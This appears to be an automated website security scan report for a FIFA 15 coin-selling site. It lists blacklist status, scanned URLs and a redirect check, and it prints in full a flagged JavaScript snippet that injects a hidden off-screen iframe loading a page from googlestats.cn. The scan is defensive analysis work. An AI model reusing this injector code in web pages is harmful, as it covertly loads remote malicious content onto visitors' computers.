Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fifa15coinbuy.co.uk
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.fifa15coinbuy.co.uk/ | 200 OK Content-Length: 29778 Content-Type: text/html | clean |
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var _q = document.createElement('iframe'), _n = 'setAttribute';
_q[_n]('src', 'http://googlestats.cn/default.html');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dr11938\'></div>');
document.getElementById('__dr11938').appendChild(_q);
Antivirus reports:
http://wikipedia-org.cn/click.js | 200 OK Content-Length: 12803 Content-Type: text/javascript | clean |
https://mylivechat.com/chatinline.aspx?hccid=30135830 | HTTP/1.1 302 Found Cache-Control: private Date: Thu, 08 Jan 2015 19:43:47 GMT Location: https://s3.mylivechat.com/livechat/livechat.aspx?hccid=30135830&apimode=chatinline Server: Microsoft-IIS/8.5 Content-Length: 203 Content-Type: text/plain; charset=utf-8 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
https://s3.mylivechat.com/livechat/livechat.aspx?hccid=30135830&apimode=chatinline | 200 OK Content-Length: 7088 Content-Type: text/javascript | clean |
http://js.users.51.la/17201935.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.fifa15coinbuy.co.uk/page/2/ | 200 OK Content-Length: 30171 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/3/ | 200 OK Content-Length: 42827 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/4/ | 200 OK Content-Length: 30598 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/5/ | 200 OK Content-Length: 30177 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/6/ | 200 OK Content-Length: 30402 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/7/ | 200 OK Content-Length: 30664 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/8/ | 200 OK Content-Length: 30192 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/9/ | 200 OK Content-Length: 29432 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/10/ | 200 OK Content-Length: 30026 Content-Type: text/html | clean |
http://www.fifa15coinbuy.co.uk/page/11/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fifa15coinbuy.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fifa15coinbuy.co.uk
Referer: http://www.google.com/search?q=fifa15coinbuy.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.